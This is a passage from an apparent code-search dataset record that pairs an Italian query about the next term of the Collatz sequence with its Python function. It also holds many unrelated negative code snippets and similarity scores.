r:\n annulus_smaller = annulus\n return annulus_smaller \n if annuli[annulus] > r:\n annulus_smaller = annulus-1\n return annulus_smaller\n return len(annuli)-1", "def arc_n(self, xn ,yn, rn, start, stop):\n x = round(xn * self.width)\n y = round(yn * self.height)\n r = round(rn * min(self.width, self.height))\n self.arc(x, y, r, start, stop)", "def rastrigin(x):\n x = np.copy(x)\n x -= 10.0\n if not np.isscalar(x[0]):\n N = len(x[0])\n min_num = np.array([10 * N + sum(xi**2 - 10 * np.cos(2 * np.pi * xi)) for xi in x])\n return min_num * (-1)\n N = len(x)\n return -(10 * N + sum(x**2 - 10 * np.cos(2 * np.pi * x)))", "def __make_denominator_integer(self):\n while self.denominator % 1 !=0:\n self.denominator *=10\n self.numerator *=10", "def rangoli(n):\r\n alphabet = string.ascii_lowercase\r\n pad = 4*n-3\r\n filler = '-'\r\n initial = [alphabet[n-1]]\r\n top = [alphabet[n-1].center(pad, filler)]\r\n\r\n for i in range(n-2, -1, -1):\r\n initial.append(alphabet[i])\r\n sub_list = initial[:-1]+[alphabet[i]]+list(reversed(initial[:-1]))\r\n sub_seq = filler.join(sub_list).center(pad, filler)\r\n top.append(sub_seq)\r\n\r\n bot = list(reversed(top[:-1]))\r\n result = '\\n'.join(top + bot)\r\n print(result)\r\n return", "def nx(self, n: int) -> float:\n result = self._read_inline(f\"nx({n})\")\n return result", "def rstar(v10, n, L4, c10=0.0):\n return 2.21*np.sqrt(L4/(n*(v10**2 + c10**2)))", "def do_dr(r, t):\n return 1/t**0.5", "def make_agree_vis_nir(self,rad):\n print( 'Ratio-ing the NIR spectra to match VIS *** Only for 4STAR ***')\n ivis = range(1055,1069)\n inir = range(1004,1037)\n mean_vis = np.nanmean(mea['rad'][600,ivis])\n mean_nir = np.nanmean(mea['rad'][600,inir])\n s_ratio_vis_nir = mean_vis/mean_nir", "def combination(n, r):\n\n \n\n \n numerator = factorial(n)\n denominator = factorial(r)\n subtracted_answer = factorial(n-r)\n \n\n answer = numerator/(denominator * subtracted_answer)\n print(answer)\n return answer", "def rastrigin(indiv):\n n = len(indiv)\n A = 10\n return A * n + sum([x**2 - A * math.cos(2 * math.pi * x) for x in indiv])", "def uz(self, n: int) -> float:\n result = self._read_inline(f\"uz({n})\")\n return result", "def n(self):\n raise NotImplementedError", "def __rdiv__(self, number):\n return self.__div__(number)", "def __neg__(self):\r\n\t\t\r\n\t\t# take negative\r\n\t\tn = self.scale(-1)\r\n\t\t\r\n\t\treturn n", "def R(self):\n\t\treturn (arange(self.rbins) + 0.5) * (self.cbins - 0.5) / self.rbins", "def polygonal_number(s, n):\n return (n*n*(s-2)-n*(s-4))/2", "def formula_n(self, n: int, x: np.ndarray) -> np.ndarray:\n\n # express x as z = x/(x-1)\n z = x / (x - 1)\n\n # special case @n=0\n if n == 0:\n kn = 1 - self._vlerchphi(1 / z, n + 1)\n else:\n kn = 1 / n - self._vzlerchphi(1 / z, n + 1)\n\n # return\n return kn", "def g(n):\n\t\"*** YOUR CODE HERE ***\"\n\tif n <= 3:\n\t\treturn n\n\telse:\n\t\treturn g(n-1) + 2*g(n-2) + 3*g(n-3)", "def NUT1(self,NUT1b,n=2.0):\n if self.tipo == 'contra':\n return n*NUT1b\n if self.tipo == 'paralelo':\n return n*NUT1b\n if self.tipo == 'misto':\n return n*NUT1b", "def reciprocal(self):\r\n s, e = self.share\r\n s = 0.5*(1/s) # TODO: no normalization for 1/s as 1/2<=abs(s)<=1 (s<0 test still needed)\r\n return type(self)((s, 1-e))", "def snr(p1, l1x, l1y, p2, l2x, l2y, var):\n ip12 = inner_product(p1, l1x, l1y, p2, l2x, l2y, var)\n ip11 = inner_product(p1, l1x, l1y, p1, l1x, l1y, var)\n ip22 = inner_product(p2, l2x, l2y, p2, l2x, l2y, var)\n\n return ip11 / (ip11 + ip22 - 2 * ip12)", "def silverman(n: int, ess: float) -> float:\n\n return (ess * (n + 2) / 4) ** (-1 / (n + 4))", "def radialInner(self):\n if self.radial in range(1, len(self.ThRZmesh.getPositions(label=\"R\"))):\n R = self.ThRZmesh.getUpper(label=\"R\", n=(self.radial - 1))\n else:\n runLog.warning(\n \"Error: Radial Index ({0}) location not INSIDE mesh \".format(\n self.radial\n )\n )\n runLog.warning(self.ThRZmesh.getPositions(label=\"R\"))\n R = None\n return R", "def ny(self, n: int) -> float:\n result = self._read_inline(f\"ny({n})\")\n return result", "def pentagon(n) -> int:\n\n return (n * (3 * n - 1)) // 2", "def __R1(x: float) -> np.float64:\n if np.abs(x) < end:\n return np.float64((1 / np.pi) * np.sqrt(2 * N - x * x))\n return np.float64(0.0)", "def rellena(self):\r\n for nodo in range(0, self.red['n']):\r\n for i in range(0, self.red.conec[nodo]):\r\n if self.red.conex[nodo][i] > nodo:\r\n ilink = self.S[int(nodo)] + self.S[int(self.red.conex[nodo][i])]\r\n ilink = ''.join(sorted(ilink))\r\n self.links[ilink][0] += 1", "def __init__(self, n: int):\n\n self.root = [-1] * n", "def z_r(b):\n return b/1e-2 + 0.5", "def calc_soma(n):\n \n # Comecamos por percorrer os caracteres de n, e juntamos a cada caracter o que estava à sua direira, do lado esquerdo, invertendo o numero. Caso um dos caracteres nao seja um algarismo, chamamos a atencao ao utilizador para o erro.\n # Seguidamente, percorremos a cadeia recem criada. OS caracteres nas posicoes impares da cadeia anterior (indices 0,2,4,..) vao ser multiplicados por 2. Se a multiplicacao der um resultado superior a 9, subtrai-se 9. Os caracteres nas posicoes pares vao para a nova cadeia sem qualquer alteracao.\n # Finalmente percorremos os elementos da cadeia e somamos, convertidos a inteiros.\n \n \n comp = len(n)\n num_invertido , num_invertido2 = '' , ''\n soma_luhn = 0\n \n for e in n:\n \n if '0' <= e <= '9': \n num_invertido = e + num_invertido\n \n else:\n raise ValueError ('function calc_soma(): O string recebido apenas pode conter digitos')\n \n \n for i in range(comp):\n \n if i%2 == 0:\n resultado = eval(num_invertido[i]) * 2\n \n if resultado > 9:\n num_invertido2 = num_invertido2 + str(resultado - 9)\n \n else:\n num_invertido2 = num_invertido2 + str(resultado)\n \n else:\n num_invertido2 = num_invertido2 + (num_invertido[i])\n \n\n for e in num_invertido2:\n soma_luhn = soma_luhn + eval(e)\n \n return soma_luhn", "def g(n):\n \"*** YOUR CODE HERE ***\"\n if n < 4:\n return n\n else:\n return g(n-1) + 2*g(n-2) + 3*g(n-3)", "def isqrt(n): # newton (from stackoverflow)\n if n < 0:\n print(f\"segur que vols fer l'arrel de {n}?\")\n n = -n\n x = n\n y = (x + 1) // 2\n while y < x:\n x = y\n y = (x + n // x) // 2\n return x", "def get_radius(self):", "def estimularRN(rn,matriz):\n if matriz == None:\n return None\n else:\n return rn.activate(matriz)", "def nsucc(self, a):\n n, absucc = self.control[a.name]\n if self.world.round == n: return 0.0\n else: return float(a.success - absucc) / float(self.world.round - n)" ]
[ "0.6703785", "0.65736157", "0.6541312", "0.6525386", "0.6515335", "0.63054556", "0.6147716", "0.61371934", "0.61207694", "0.6074879", "0.60558325", "0.605559", "0.6001547", "0.59967726", "0.5936649", "0.5906539", "0.58998317", "0.5871071", "0.58641", "0.5848409", "0.58474976", "0.5843289", "0.5839744", "0.58339447", "0.5823272", "0.5820578", "0.5820448", "0.58011466", "0.5767946", "0.5758748", "0.5744038", "0.5725037", "0.57211614", "0.57135856", "0.5711033", "0.5702549", "0.5701677", "0.5701239", "0.5680635", "0.5672732", "0.5670052", "0.5669921", "0.5666063", "0.5633344", "0.56330574", "0.56125164", "0.56029373", "0.5596752", "0.5589488", "0.5589168", "0.55887896", "0.5586389", "0.5572834", "0.55580765", "0.55580765", "0.5546349", "0.5512525", "0.5509644", "0.5504229", "0.550409", "0.55018115", "0.5493197", "0.5481229", "0.54798305", "0.54776746", "0.54775333", "0.5460869", "0.54524857", "0.5449226", "0.5446364", "0.5445703", "0.5441641", "0.54310954", "0.5430057", "0.5424709", "0.54210097", "0.5411157", "0.540689", "0.5405978", "0.5405043", "0.5391351", "0.53796417", "0.53795016", "0.5378202", "0.5373829", "0.5364852", "0.53583246", "0.53571844", "0.53552765", "0.53486925", "0.53475446", "0.53414816", "0.53412133", "0.53410673", "0.53400016", "0.53396815", "0.5337552", "0.5337266", "0.5336227", "0.53350073" ]
0.68493146
0
Fornisce l'elemento successivo nella sequenza di Collatz
def collatz(n): if n%2==0: return n/2 else: return 3*n+1
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def busca_sequencial_sentinela(lista, elemento):\n contador = 0\n lista.append(contador) \n try: \n while lista[contador] != elemento:\n contador += 1\n if contador == len(lista) - 1:\n del lista[-1]\n return -1\n \n del lista[-1]\n return contador\n except IndexError:\n print('Elemento nao achado')", "def atender(self):\n\n if self.enfila>0: #Para que atiendan solamente si e que hay alguien en la fila\n\n self.enfila-=1\n self.fila.pop(0) #Saco primer elemento de la fila (Atienden al primer cliente)", "def enchere(self):\n\n i = 0\n while i < 5 and self.annonce < 4:\n paroleJ = self.joueurs[i].parler(self.annonce)\n if paroleJ != 0:\n self.annonce = paroleJ\n self.indiceJoueurQuiPrend = i\n i += 1\n\n print(\"joueur qui prend : \" + str(self.indiceJoueurQuiPrend))\n if self.indiceJoueurQuiPrend != -1:\n print(\"annonce : \" + str(self.annonce))\n if self.annonce == 1 or self.annonce == 2:\n self.joueurs[self.indiceJoueurQuiPrend].possedeChien = True\n self.joueurs[self.indiceJoueurQuiPrend].construireChien()\n self.debuterPartie()\n\n else:\n self.finirPartie()", "def back(self):\n try:\n self.tiempos.anterior()\n except StopIteration:\n return", "def esta_al_final(self):\n\t\treturn self.posicion == (len(self.lista) - 1)", "def update_cola(self):\n self.listUsuarioAtentiendo.append(self.listUsuario[0])\n self.listUsuario.pop(0)\n self.cola -= 1", "def step(self):\n try:\n self.tiempos.siguiente()\n except StopIteration:\n return", "def retroceder(self):\n\t\tif self.pila_anteriores.esta_vacia(): \n\t\t\traise StopIteration(\"Esta al principio.\")\n\t\tself.actual = self.anterior\n\t\tself.anterior = self.pila_anteriores.desapilar()\n\t\tself.posicion -= 1\n\t\treturn self.actual.dato", "def mostrarBicicletasDisponiveis(self) -> int:\n estoque_atual = Loja().mostrarEstoque()\n print(f'Bicicletas disponíveis: {estoque_atual}')\n return estoque_atual", "def custo(EstadoRestaUm, resultante):\n return 1", "def rellenar_atril(self):\n while self.get_atril_espaciosVacios() > 0 and self.bolsa.cantidad_Fichas() > 0:\n self.agregar_al_atril()", "def bloqueio_de_bifurcacao_4(tab,jog): \r\n if len(bifurcacao_3(tab,-1*jog)) == 1 :\r\n return bifurcacao_3(tab,-1*jog)[0]\r\n else:\r\n for i in range(1,4):\r\n if obter_coluna(tab,i).count(jog)==1:\r\n col = obter_coluna(tab,i)\r\n for j in range(3):\r\n if col[j]==0:\r\n pos1=3*j+i\r\n newtab = marcar_posicao(tab, jog, pos1)\r\n if len(bifurcacao_3(newtab,-1*jog)) == 0:\r\n return pos1\r\n \r\n if obter_linha(tab,i).count(jog)==1:\r\n linha = obter_linha(tab,i)\r\n for j in range(3):\r\n if linha[j]==0:\r\n pos1=j+1+3*(i-1)\r\n newtab = marcar_posicao(tab, jog, pos1)\r\n if len(bifurcacao_3(newtab,-1*jog)) == 0:\r\n return pos1\r\n \r\n if i < 3 and obter_diagonal(tab,i).count(jog)==1:\r\n diagonal = obter_diagonal(tab,i)\r\n for j in range(3):\r\n if i==1:\r\n if diagonal[j]==0:\r\n pos1=4*j+i\r\n newtab = marcar_posicao(tab, jog, pos1)\r\n if len(bifurcacao_3(newtab,-1*jog)) == 0:\r\n return pos1\r\n else:\r\n if diagonal[j]==0:\r\n pos1=7-2*j\r\n newtab = marcar_posicao(tab, jog, pos1)\r\n if len(bifurcacao_3(newtab,-1*jog)) == 0:\r\n return pos1", "def representarArbolAutomatico(self):\n if not self.stepByStep:\n print(\"Pintar paredes en auto\")\n # Reinicio la matrix\n self.reiniciarMatrix()\n if self.arbol.raiz != None:\n # Capturo todos los valores\n for i in self.arbol.returnArbolComoVector():\n \n # Esta variable captura si se debe de pintar en x o y\n xy = int(i[1])\n cordenadas = i[0]\n print(\"===========NODOS DEL ARBOL=============\")\n print(i)\n print(\"===========NODOS DEL ARBOL=============\")\n # Se pinta en x o y?\n if xy == 0:\n self.crearParedX(int(cordenadas[0]), int(cordenadas[1]))\n else:\n self.crearParedY(int(cordenadas[0]), int(cordenadas[1]))\n\n self.esperarUnRato()\n\n print(\"========LISTO PARA PINTAR EL SIGUIENTE================\")\n \n else:\n print(\"Arbol vacio\")", "def __init__(self, lista_enlazada): \n\t\tself.lista = lista_enlazada\n\t\tself.anterior = None\n\t\tself.actual = lista_enlazada.prim\n\t\tself.pila_anteriores = Pila()\n\t\tself.posicion = 0", "def successeurs(self,etat):\n pass", "def first(self):\n if self.is_empty():\n raise Empty('La cola está vacía')\n return self._head._element # frente alineado con la cabeza de la lista", "def modification_de_couleur(var,y):\n for i in range(len(Couleurs)): #Permet de savoir à quel valeur\n if L[i] == var: #de la liste la personne est en\n break #arrivant.\n while True:\n rectangle(410,y,437,y+17,'black','#A9A9A9')\n rectangle(410,y+23,437,y+40,'black','#A9A9A9')\n fleche(424,y+20,424,y+5,'black',2)\n fleche(424,y+30,424,y+35,'black',2)\n x2,y2,z2=attente_clic()\n if 410<=x2<=437:\n if y<=y2<=y+17:\n i += 1\n elif y+23<=y2<=y+40:\n i -=1\n else:\n return Couleurs[i],Couleurs2[i]\n if i >= 12:\n i = 0\n if i < 0:\n i = 11\n cercle(100,120,10,Couleurs[i],Couleurs2[i])\n cercle(120,120,10,Couleurs[i],Couleurs2[i])\n cercle(140,120,10,Couleurs[i],Couleurs2[i])", "def otra_partida():\r\n\r\n for jugador_1 in juego.get_jugadores():\r\n\r\n \"\"\"Va Iterando sobre todos los jugadores disponibles de uno en uno\"\"\"\r\n color.utilizarVerde()\r\n print(\"\\nEmpieza: {}\".format(jugador_1.get_jugado_nombre()))\r\n num1, num2 = juego.get_rangos()\r\n print(\"Rango de {} al {}\".format(num1, num2))\r\n jugador_1.set_jugador_intentos(4)\r\n intentos = jugador_1.get_jugador_intentos()\r\n numero_oculto = randint(num1, num2)\r\n puntos = jugador_1.get_jugador_puntuacion_total()\r\n\r\n while intentos >= 0:\r\n\r\n \"\"\"Empieza la partida con 4 Intentos hasta que se quede en 0\"\"\"\r\n\r\n try:\r\n color.utilizarVerde()\r\n numero = int(input(\"\\nIntroduce un Número: \"))\r\n color.utilizarAmarillo()\r\n print(\"Intetos Restantes: {}\".format(intentos - 1))\r\n if numero_oculto < numero and intentos != 1:\r\n color.utilizarRojoClarito()\r\n print(\"\\nEs Demasiado Grande\\n\")\r\n intentos -= 1\r\n jugador_1.set_jugador_intentos(intentos)\r\n\r\n elif numero_oculto > numero and intentos != 1:\r\n color.utilizarRojoClarito()\r\n print(\"\\nEs Demasiado Pequeño\\n\")\r\n intentos -= 1\r\n jugador_1.set_jugador_intentos(intentos)\r\n\r\n elif numero == numero_oculto:\r\n color.utilizarAzul()\r\n print(\"\\nHas Ganado en el {0} intento\".format(intentos))\r\n puntos += 1\r\n jugador_1.set_jugador_puntuacion_total(puntos)\r\n input(\"Pulse enter para continuar...\")\r\n break\r\n\r\n elif numero != numero_oculto and intentos == 1:\r\n color.utilizarVerdeClarito()\r\n print(\"\\nEl número era {} :(\\n\".format(numero_oculto))\r\n color.utilizarRojo()\r\n print(format(\"GAME OVER\", \"-^75\"))\r\n input(\"Pulse enter para continuar...\")\r\n break\r\n\r\n except (ValueError, NameError):\r\n print(\"\\nError: Tiene que ser un número ...\")", "def mezclar_bolsa(self):", "def espera_transbordo_o_interrumpe(self, sistema, tespera=float(\"Inf\")): # TODO Cambiar de nombre\r\n\r\n if self.tipo == \"Carga\":\r\n tipo_camion_en_esp = \"Descarga\"\r\n else:\r\n tipo_camion_en_esp = \"Carga\"\r\n\r\n # Si hay un camion esperando con el que se puede realizar un transbordo, se interrumpe su espera\r\n if len(sistema.colas_espera_transbordo[self.carga][tipo_camion_en_esp]) != 0:\r\n\r\n print str(self) + \" Interrumpe espera - Hora: \" + str(sistema.now)\r\n self.transbordo = \"Si\"\r\n camion_en_espera = sistema.colas_espera_transbordo[self.carga][tipo_camion_en_esp][0][0]\r\n espera_en_proceso = sistema.colas_espera_transbordo[self.carga][tipo_camion_en_esp][0][1]\r\n\r\n self.interrumpe_espera_transbordo(espera_en_proceso)\r\n\r\n sistema.colas_espera_transbordo[self.carga][tipo_camion_en_esp].pop(0) # TODO revisar\r\n camion_interrumpido = camion_en_espera\r\n\r\n self.manipulado.succeed()\r\n yield camion_interrumpido.manipulado\r\n\r\n sistema.exit({\"Resultado\": \"Interrumpio espera\", \"Interrupcion\": None})\r\n\r\n # Si no hay camiones esperando entonces el camion espera\r\n else:\r\n\r\n espera_transbordo = sistema.process(self.espera_transbordo(sistema, tespera))\r\n sistema.colas_espera_transbordo[self.carga][self.tipo].append([self, espera_transbordo])\r\n\r\n resultado_espera = yield espera_transbordo\r\n\r\n # Si el camion concluyo la espera, sale de la cola\r\n if resultado_espera[\"Resultado\"] == \"Termino espera\":\r\n sistema.colas_espera_transbordo[self.carga][self.tipo].pop(0) # TODO revisar\r\n\r\n sistema.exit(resultado_espera)", "def primer_ajuste(memoria, procesos):\n\n no_colocados = [] # Procesos que no se pudieron colocar en la memoria\n\n for proc in procesos:\n exito = False\n \n for part in memoria:\n if part[1] == None and part[0] >= proc[1]:\n part[1] = proc[0]\n exito = True\n break\n\n if not exito:\n no_colocados.append(proc[0])\n\n return memoria, no_colocados", "def transition(self,schedule):\n\t\tc_p = self.validSchedule(schedule)[1]\n\t\trow = c_p[1]\n\t\tstart = c_p[0][0]\n\t\tc = c_p[0][1]\n\t\tspace = c.length\n\t\tstart_new = start\n\t\tfor i in range(19):\n\t\t\ttry:\n\t\t\t\tif schedule.w[row][start-i-1] == None:\n\t\t\t\t\tspace += 1\n\t\t\t\t\tstart_new -= 1\n\t\t\t\telse:\n\t\t\t\t\tbreak\n\t\t\texcept IndexError:\n\t\t\t\tbreak\n\t\tfor i in range(19):\n\t\t\ttry:\n\t\t\t\tif schedule.w[row][start+i+1] == None:\n\t\t\t\t\tspace += 1\n\t\t\t\telse:\n\t\t\t\t\tbreak\n\t\t\texcept IndexError:\n\t\t\t\tbreak\n\n\t\tfor i in range(len(schedule.w)):\n\t\t\tj = 0\n\t\t\twhile j < len(schedule.w[i]) and (j<start or j>start+c.length):\n\t\t\t\tif schedule.w[i][j] != None and schedule.w[i][j][1].length\\\n\t\t\t\t <=space and schedule.w[i][j][1].id!=c.id\\\n\t\t\t\t and c.length<=schedule.w[i][j][1].length:\n\t\t\t\t\ttemp = i,j,schedule.w[i][j][1]\n\t\t\t\t\tschedule.delContent(temp[0],temp[1],temp[2])\n\t\t\t\t\t#print \"add,\",c\n\t\t\t\t\tschedule.addContent(temp[0],temp[1],c)\n\t\t\t\t\tschedule.delContent(row,start,c)\n\t\t\t\t\t#print \"add,\",temp[2]\n\t\t\t\t\tschedule.addContent(row,start_new,temp[2])\n\t\t\t\telif schedule.w[i][j] == None:\n\t\t\t\t\tj += 1\n\t\t\t\telse:\n\t\t\t\t\tj += schedule.w[i][j][1].length\n\t\treturn schedule", "def sequencial_cartao(self):\n return self._sequencial_cartao", "def avanzar(self):\n\t\tif (not len(self.lista)) or (self.esta_al_final()): \n\t\t\traise StopIteration(\"Esta al final.\")\n\t\tself.pila_anteriores.apilar(self.anterior)\n\t\tself.anterior = self.actual\n\t\tself.actual = self.actual.prox\n\t\tself.posicion += 1\n\t\treturn self.actual.dato", "def cellules(self): # itérateur rendu safe\n cellule_courante = self.tete\n while cellule_courante is not None:\n cellule_suivante = cellule_courante.suivant # sauvegarde\n yield cellule_courante\n cellule_courante = cellule_suivante # récupération de la sauvegarde", "def arranca(self):\n \n if self.t0 == None:\n self.t0 = self.timeFunc()\n self.funciona = True\n if not self.funciona:\n self.retraso += self.timeFunc() - self.parada\n self.funciona = True", "def sequencia_nao_utilizada(self, serie, sequencia_utilizada):\r\n # python /u1/caixa/nfce.py -p listagem -n 1 300 -s 80 -ib 1\r\n\r\n sequencia_utilizada = sorted(sequencia_utilizada)\r\n inicial = sequencia_utilizada[0]\r\n final = sequencia_utilizada[-1] + 1\r\n\tdic = collections.Counter(sequencia_utilizada)\r\n\tnotas_nao_utilizadas = [i for i in range(inicial, final) if dic[i] == 0]\r\n \r\n nova_listagem = []\r\n for nota in notas_nao_utilizadas:\r\n dnot = {}\r\n dnot[\"docsitcodigo\"] = 999 \r\n dnot[\"descricao\"] = \"Sequencia nao utilizada\"\r\n\t dnot[\"docnumero\"] = nota\r\n dnot[\"docserie\"] = serie\r\n\t nova_listagem.append(dnot)\r\n return nova_listagem", "def establecerSeccion(self, cuentas, unaSeccion):\n for unaCuenta in cuentas :\n unaCuenta.seccion = unaSeccion\n self.almacen.commit()", "def collatz(start):\n n = start\n\n collatz_sequence = [n]\n\n while global.collatz_sequences.key().contains(n):\n if n % 2 == 0:\n n = n // 2\n else:\n n = 3 * n + 1\n\n collatz_sequence.append(n)\n\n global.collatz_sequences[]\n\n return collatz_sequence", "def __init__(self, mot):\n premiere_cellule = None\n self.taille = 0\n for lettre in reversed(mot):\n premiere_cellule = Cellule(lettre, premiere_cellule)\n self.taille += 1\n self.tete = premiere_cellule", "def aestrella(inicio,obj):\n nodos_abiertos=[inicio]\n nodos_cerrados=[]\n lista1=[]\n for cel in nodos_abiertos:\n lista1.append(cel.costo)\n m=min(lista1)\n for j in nodos_abiertos:\n j.set_gscore(g(inicio,j))\n j.set_hscore(h(j,obj))\n j.set_fscore(f(inicio,obj))\n if j.fscore==m:\n if j==obj:\n print'terminado'\n nodos_cerrados.append(j)\n else:\n nodos_abiertos.append(j)\n for k in j.vecinos:\n if k in nodos_cerrados :\n gk=k.gscore\n gk1=k.get_gscore()\n if gk1<=gk:\n k.set_gscore=gk1\n j=k\n else:\n pass\n elif k in nodos_abiertos:\n gk=k.gscore\n gk1=k.get_gscore\n if gk1<=gk:\n k.set_gscore=gk1\n j=k\n else:\n pass\n \n else:\n nodos_abiertos.append(k)\n k.set_gscore()\n else:\n pass\n ruta=[] \n for u in nodos_cerrados:\n lnc=len(nodos_cerrados)\n for v in range(lnc):\n ruta.insert(v,nodos_cerrados[lnc-v])\n return ruta", "def get_one_order():", "def get_successor(self):\n return None", "def backm(self,numero):\n try:\n for x in range(numero):\n self.tiempos.anterior()\n except StopIteration:\n return", "def conclusion_echantillon(self, liste_foetus):\n compteur = 0\n for lignes in range(1, len(liste_foetus)):\n if liste_foetus[lignes].contamination != 0 and liste_foetus[lignes].taux > self.seuil_taux_conta:\n compteur = compteur + 1\n if compteur > self.seuil_nbre_marqueurs:\n self.conclusion = 1\n else:\n self.conclusion = 0", "def first(self):", "def cozmoBehavior(robot: cozmo.robot.Robot):\r\n \r\n global grid, stopevent\r\n #robot.pose = Pose(0,0,0,angle_z = degrees(0))\r\n scale = grid.getScale()\r\n start = grid.getStart()\r\n #print(\"Start %i,%i\",start[0],start[1])\r\n #print(\"Scale %i\",scale)\r\n #print(robot.pose)\r\n pose = cell_to_pose(start,scale,0)\r\n #print(pose)\r\n robot.go_to_pose(cell_to_pose(start,scale,0)).wait_for_completed()\r\n cubes_seen = set()\r\n while not stopevent.is_set():\r\n cube = None\r\n count = 0\r\n while(cube is None):\r\n try:\r\n cube = robot.world.wait_for_observed_light_cube(timeout=1)\r\n except Exception:\r\n robot.turn_in_place(cozmo.util.degrees(15)).wait_for_completed()\r\n count += 1\r\n if count >= 6:\r\n start = (start[0]+1,start[1]+1)\r\n grid.setStart(start)\r\n robot.go_to_pose(cell_to_pose(start,scale,0)).wait_for_completed()\r\n count = 0\r\n \r\n cubes_seen.add(cube.cube_id)\r\n finalanlge = cube.pose.rotation.angle_z.degrees\r\n robot.say_text(\"I see the cube\").wait_for_completed()\r\n #print(cube.pose)\r\n block = pose_to_cell(cube.pose,scale)\r\n grid.addObstacle(block)\r\n finish = get_finish_from_pose(cube.pose,scale)\r\n grid.addGoal(finish)\r\n astar(grid,heuristic)\r\n \r\n \r\n newpath = True\r\n while newpath:\r\n newpath = False\r\n path = grid.getPath()\r\n last = path[0]\r\n for i in range(len(path)):\r\n angle = 0\r\n if i+1 < len(path):\r\n angle = get_angle(path[i],path[i+1])\r\n robot.go_to_pose(cell_to_pose(path[i],scale,angle)).wait_for_completed()\r\n newcube = None\r\n try:\r\n newcube = robot.world.wait_for_observed_light_cube(timeout=1)\r\n except Exception:\r\n print(\"don't do anything\")\r\n if newcube is not None and newcube.cube_id not in cubes_seen:\r\n cubes_seen.add(newcube.cube_id)\r\n robot.say_text(\"I found a new cube\").wait_for_completed()\r\n grid.setStart(path[i])\r\n grid.addObstacle(pose_to_cell(newcube.pose,scale))\r\n grid.clearPath()\r\n grid.clearVisited()\r\n astar(grid,heuristic)\r\n newpath = True\r\n break\r\n \r\n if not newpath:\r\n robotangle = robot.pose.rotation.angle_z.degrees\r\n robot.turn_in_place(cozmo.util.degrees(finalanlge-robotangle)).wait_for_completed()\r\n break\r\n stopevent.set()", "def complementary_seq(self):\n if not self.data['DNAseq']:\n self.complement_seq_var.set(0)\n self.warning('No DNA sequence loaded','You have to load a DNA sequence first')\n return\n compl={'A':'T','T':'A','C':'G','G':'C'}\n comDNA=''\n for base in self.data['DNAseq']:\n comDNA=comDNA+compl[base]\n self.data['DNAseq']=comDNA\n\n # Update\n self.update_sequence_window()\n return", "def test_un_compte_est_creer_avec_solde_nul(self):\n\t\tcompte=Compte()\n\t\tself.assertEqual([0.0], compte.solde)", "def finished(self):", "def set_crecimiento(self):\n return self.write({'state': 'Crecimiento'})", "def entre_primeros_cola_recurso(self, recurso):\r\n\r\n if self in recurso.cola[0:recurso.capacity]:\r\n return True\r\n else:\r\n return False", "def Lluiteu(self) -> IResultList:\n\n if len(self._Lluitadors) != 2:\n print(\"ERROR. Falten lluitadors\")\n exit\n\n elQuePica = randint(0, 1)\n\n while self._Lluitadors[0].es_Ko() == False and self._Lluitadors[1].es_Ko() == False:\n elQueRep = (elQuePica+1) % 2\n proteccio = self._Lluitadors[elQueRep].get_Lluitador().Protegeix()\n pica = self._Lluitadors[elQuePica].get_Lluitador().Pica()\n\n if pica in proteccio:\n self._Lluitadors[elQueRep].treu_vida()\n print(\n f'{self._Lluitadors[elQueRep].get_nom()} rep un cop al {pica.name} de {self._Lluitadors[elQuePica].get_nom()}')\n else:\n print(\n f'{self._Lluitadors[elQueRep].get_nom()} atura el cop al {pica.name} de {self._Lluitadors[elQuePica].get_nom()}')\n elQuePica = elQueRep\n\n guanyador = next(x for x in self._Lluitadors if x.es_Ko() == False)\n perdedor = next(i for i in self._Lluitadors if i.es_Ko() == True)\n\n comentariLocutor = \"\"\n\n if (guanyador.get_vida() - perdedor.get_vida()) > 5:\n comentariLocutor = \"Quina pallissa!!\"\n\n print(f\"{perdedor.get_nom()} cau a terra!\")\n print(f\"VICTÒRIA DE {guanyador.get_nom()}!!! {comentariLocutor}\")\n\n return self._Lluitadors", "def add_couche(self, pos):\n if self.control == 0:\n if pos >= 0 and pos < (self.couche):\n self.couche.insert(pos, 0)\n else:\n print(\"Vous pouvez ajouter une couche dans l'intervale [0,\" + str(len(self.couche)) + \"]\")\n else:\n print(\"Le réseau est deja créé, vous en pouvez plus le modifier\")", "def collatz(n):\n sequence = []\n\n while n != 1:\n if n > 1:\n sequence = sequence + [n]\n n = collatz_step(n)\n elif n < 1:\n n = collatz_step(n)\n sequence = sequence + [n]\n break\n if n == 1:\n sequence = sequence + [n]\n return sequence\n print sequence", "def agentbehavior1(cola):\n # Registramos el agente\n gr = register_message()\n\n # Escuchando la cola hasta que llegue un 0\n fin = False\n while not fin:\n while cola.empty():\n pass\n v = cola.get()\n if v == 0:\n fin = True\n else:\n print v\n\n # Selfdestruct\n #requests.get(InfoAgent.stop)", "def agentbehavior1(cola):\n # Registramos el agente\n gr = register_message()\n\n # Escuchando la cola hasta que llegue un 0\n fin = False\n while not fin:\n while cola.empty():\n pass\n v = cola.get()\n if v == 0:\n fin = True\n else:\n print v\n\n # Selfdestruct\n #requests.get(InfoAgent.stop)", "def cliquer(self):\n self.nb_clic += 1\n self.message[\"text\"] = \"Vous avez cliqué {} fois.\".format(self.nb_clic)", "def mark_add_prev(self,duracion):\n if not self.tiempos.posicion_actual():\n self.mark_add(duracion) # Si se encuentra en la posicion inicial no hay marca previa\n return\n mark = MarcaDeTiempo(duracion)\n self.tiempos.insert(self.tiempos.posicion_actual()-1, mark)\n self.tiempos.actualizar()", "def insere(self, no):\n y = None\n x = self.getRaiz()\n while x is not None:\n y = x\n if no.getChave() < x.getChave():\n x = x.getEsquerdo()\n else:\n x = x.getDireito()\n no.setPai(y)\n if y is None:\n self.setRaiz(no)\n elif no.getChave() < y.getChave():\n y.setEsquerdo(no)\n else:\n y.setDireito(no)", "def first(self):\n if self.is_empty():\n raise Empty(\"Deque está vacío\")\n return self._header._next._element # un artículo real justo después de la cabecera", "def _finish_element(self):\n assert self.currentelem.indexend is True\n self.currentelem.indexend = self._parser.CurrentByteIndex + self.baseposition\n self.currentelem = self.currentelem.parent", "def select_next_cup(self):\n idx = self.current_cup_idx()\n idx += 1\n if idx >= len(self.cups):\n idx = 0\n self.current_cup = self.cups[idx]", "def ubicar_submarino(): #esta clase de barcos no tiene orientacion\n tamano = Submarinos.tamano #se importa el tamano del barco desde su clase\n cantidad = Submarinos.cantidad #se importa la cantidad de barcos desde su clase\n while cantidad > 0:\n mal_ubicado = \"no\"\n coor_fila = randint(1,numero_filas)\n coor_columna = randint(1,numero_columnas)\n ubicacion = (coor_fila, coor_columna)\n for x in lista_ubicacion_barco:\n if x == ubicacion:\n 